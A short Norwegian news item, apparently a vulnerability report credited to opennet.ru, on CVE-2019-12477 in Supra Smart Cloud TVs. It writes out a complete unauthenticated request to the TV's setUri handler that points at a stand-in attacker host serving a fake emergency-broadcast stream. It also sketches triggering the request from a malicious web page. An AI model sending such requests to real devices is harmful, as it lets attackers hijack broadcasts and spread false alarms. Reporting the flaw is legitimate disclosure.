På Supra Smart Cloud TV-er sårbarhet (CVE-2019-12477) som lar deg erstatte programmet som vises for øyeblikket med innholdet til angriperen. Som et eksempel er resultatet av en fiktiv advarsel om en nødsituasjon demonstrert.
For et angrep er det nok å sende en spesiallaget nettverksforespørsel som ikke krever autentisering. Spesielt kan du få tilgang til "/remote/media_control?action=setUri&uri="-behandleren ved å spesifisere URL-en til m3u8-filen med videoparametere, for eksempel "http://192.168.1.155/remote/media_control?action=setUri&uri= http://attacker .com/fake_broadcast_message.m3u8."
I de fleste tilfeller er tilgangen til TV-ens IP-adresse begrenset til det interne nettverket, men siden forespørselen sendes via HTTP, er det mulig å bruke metoder for å få tilgang til interne ressurser når brukeren åpner en spesialdesignet ekstern side (for eksempel under dekke av en bildeforespørsel eller bruk av ).
Kilde: opennet.ru